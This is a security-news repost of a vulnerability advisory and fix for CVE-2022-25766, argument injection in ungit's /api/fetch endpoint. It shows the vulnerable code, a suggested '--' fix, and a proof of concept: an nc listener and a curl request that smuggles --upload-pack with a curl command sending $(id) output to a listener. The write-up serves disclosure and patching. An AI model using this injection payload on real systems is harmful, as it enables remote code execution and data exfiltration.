Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-25766: Fix potential remote code exec by jung-kim · Pull Request #1510 · FredrikNoren/ungit

The package ungit before 1.5.20 are vulnerable to Remote Code Execution (RCE) via argument injection. The issue occurs when calling the /api/fetch endpoint. User controlled values (remote and ref) are passed to the git fetch command. By injecting some git options it was possible to get arbitrary command execution.

CVE
#vulnerability#web#windows#apple#ubuntu#linux#nodejs#js#git

source: snyk.io

Vulnerability: Remote Code Execution****Affected Version: *****Technical Details:

It’s possible to get remote code execution via argument injection.

The issue occurs when calling the /api/fetch endpoint. The user input is passed to the git subcommand fetch. Even if a safe API like spawn is used to execute shell commands (

const gitProcess = child_process.spawn(gitBin, args.commands, procOpts);

), in this specific case it’s still possible to run arbitrary commands via argument injection.

The fetch subcommand accepts a special argument --upload-pack (https://git-scm.com/docs/git-fetch#Documentation/git-fetch.txt—upload-packltupload-packgt). Since the user controls two values provided to the fetch git subcommand (remote and ref), it is possible to execute arbitrary commands by providing the remote value to be --upload-pack="command to execute". The command executed will be similar to the following:

git fetch --upload-pack="command to execute" foobar

Here is the code that accepts these values:

//

'fetch’,

req.body.remote,

req.body.ref ? req.body.ref : '’,

config.autoPruneOnFetch ? ‘–prune’ : '’,

app.post(
${exports.pathPrefix}/fetch,
ensureAuthenticated,
ensurePathExists,
ensureValidSocketId,
(req, res) => {
// Allow a little longer timeout on fetch (10min)
if (res.setTimeout) res.setTimeout(tenMinTimeoutMs);

  const task = gitPromise({
    commands: credentialsOption(req.body.socketId, req.body.remote).concat([
      'fetch',
      req.body.remote,
      req.body.ref ? req.body.ref : '',
      config.autoPruneOnFetch ? '--prune' : '',
    ]),
    repoPath: req.body.path,
    timeout: tenMinTimeoutMs,
  });

  jsonResultOrFailProm(res, task).finally(emitGitDirectoryChanged.bind(null, req.body.path));
}

);

Potential Fix

A possible remediation to fix this issue could be to add – (see here for more information about it https://git-scm.com/docs/gitcli/2.25.0#_description) before the user provided values (it’s just a suggestion):

    commands: credentialsOption(req.body.socketId, req.body.remote).concat([
      'fetch',
      config.autoPruneOnFetch ? '--prune' : '',
      '--',
      req.body.remote,
      req.body.ref ? req.body.ref : ''
    ]),

Proof Of Concept/Steps to Reproduce

Install ungit and setup a project (I used ungit repo itself)
cd /home/ubuntu/poc/
npm install -g ungit
git clone https://github.com/FredrikNoren/ungit.git
cd ungit/
ungit
the project will be available at http://localhost:8448/#/repository?path=/home/ubuntu/poc/ungit
RCE Exploitation
setup a listener for accepting incoming connections:
nc -nvlp 8000

run the following curl command to get the output of the id command:
curl -d ‘{"path":"/home/ubuntu/poc/ungit","remote":"–upload-pack=curl http://localhost:8000/ --data "$(id)"","ref":"foobar","socketId":1}’ -H “Content-Type: application/json” -X POST http://localhost:8448/api/fetch

This is the same request sent:

POST /api/fetch HTTP/1.1
Host: localhost:8448
Content-Length: 134
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: application/json
Content-Type: application/json
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost:8448/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: [http://localhost:8448/
Accept-Encoding](http://localhost:8448/%0DAccept-Encoding): gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"path":"/home/ubuntu/poc/ungit","remote":"--upload-pack=curl http://localhost:8000/ --data \"$(id)\"",
"ref":"foobar",
"socketId":1}

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907